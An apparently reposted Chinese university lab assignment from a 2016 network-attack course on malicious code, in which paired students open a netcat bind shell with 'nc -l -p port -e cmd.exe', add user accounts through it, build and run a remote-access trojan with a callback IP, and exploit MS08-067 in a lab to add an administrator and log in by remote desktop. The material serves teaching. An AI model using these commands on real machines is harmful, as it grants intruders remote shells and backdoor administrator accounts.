实验四 恶意代码技术
學 ??號
?
中國人民公安大學
Chinese people’?public security university
?
網絡對抗技術
實驗報告
?
| 實驗四 |
| 惡意代碼技術 |
?
?
?
| 學生姓名 | 高海贏? |
| 年級 | 2014級? |
| 區隊 | 6區隊? |
| 指導教師 | 高見? |
?
?
信息技術與網絡安全學院
2016年11月7日
?
實驗任務總綱
2016—2017?學年?第 一?學期
一、實驗目的
1.通過對木馬的練習,使讀者理解和掌握木馬傳播和運行的機制;通過手動刪除木馬,掌握檢查木馬和刪除木馬的技巧,學會防御木馬的相關知識,加深對木馬的安全防范意識。
?
2.了解并熟悉常用的網絡攻擊工具,木馬的基本功能;
3.達到鞏固課程知識和實際應用的目的。
二、實驗要求
1.認真閱讀每個實驗內容,需要截圖的題目,需清晰截圖并對截圖進行標注和說明。
2.文檔要求結構清晰,圖文表達準確,標注規范。推理內容客觀、合理、邏輯性強。
3.軟件工具可使用NC、MSF等。
4.實驗結束后,保留電子文檔。
三、實驗步驟
1.準備
提前做好實驗準備,實驗前應把詳細了解實驗目的、實驗要求和實驗內容,熟悉并準備好實驗用的軟件工具,按照實驗內容和要求提前做好實驗內容的準備。
2.實驗環境
描述實驗所使用的硬件和軟件環境(包括各種軟件工具);
開機并啟動軟件office2003或2007、瀏覽器、加解密軟件。
3.實驗過程
1)啟動系統和啟動工具軟件環境。
2)用軟件工具實現實驗內容。
4.實驗報告
按照統一要求的實驗報告格式書寫實驗報告。把按照模板格式編寫的文檔嵌入到實驗報告文檔中,文檔按照規定的書寫格式書寫,表格要有表說圖形要有圖說。
?
任務一 利用NC控制電腦
?
?NetCat,具有網絡軍刀之稱,它小巧精悍且功能強大,說它小巧精悍,是因為他的軟件大小現在已經壓縮到只有十幾KB,而且在功能上絲毫不減。
?
實驗過程需要兩個同學相互配合完成:
?
步驟一:
?
???在受害者的機器 (同學A)
輸入下面的命令:
nc.exe?-l -p port -e cmd.exe ??進入監聽模式
?
步驟二:
在攻擊者的機器.(同學B)
輸入下面的命令:
nc ip??port //連接victim_IP,然后得到一個shell。 (需要截圖)
?
步驟三:
????在shell中,利用net user 用戶名 密碼 /add ,添加一個用戶,并在受害者的機器中使用 net user 命令進行驗證。(需要截圖)
?
?
?
?可以繼續通過命令行做一些事情。
?
任務二 利用木馬控制電腦
?
實驗過程需要兩個同學配合:
?
步驟一:
?
??? 攻擊者的機器. (同學A)
打開V2014.exe程序或則star RAT,這兩個木馬功能類似。
?
步驟二:
點擊菜單欄中的“服務生成”,在彈出的配置服務端中,配置回連IP地址(攻擊者IP)和端口號,并點擊“生成”按鈕,生成木馬服務端。
?
步驟三:
將生成的木馬可執行程序拷貝到受害者的機器,并雙擊運行。?
步驟四:?
在控制端中查看木馬上線情況,并對以下功能每個進行測試和截圖。?
屏幕控制,嘗試獲取桌面
?
?
會話管理,卸載對方的木馬。
?
任務三 通過漏洞獲取shell(合天平臺中做) 所有過程截圖寫博客
?
?
windows ms08067 漏洞利用
在平臺中獲取shell之后,繼續利用攻擊機器使用
net localgroup administrators /add
命令向被攻擊的機器中添加賬戶,并提升為管理員
然后用rdesktop 10.1.1.130 登陸對方的遠程桌面
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
轉載于:https://www.cnblogs.com/P201421460016/p/7723248.html
與50位技術專家面對面20年技術見證,附贈技術全景圖總結
以上是生活随笔為你收集整理的实验四 恶意代码技术的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Nova计算节点安装配置
- 下一篇: SCR638红外接收管介绍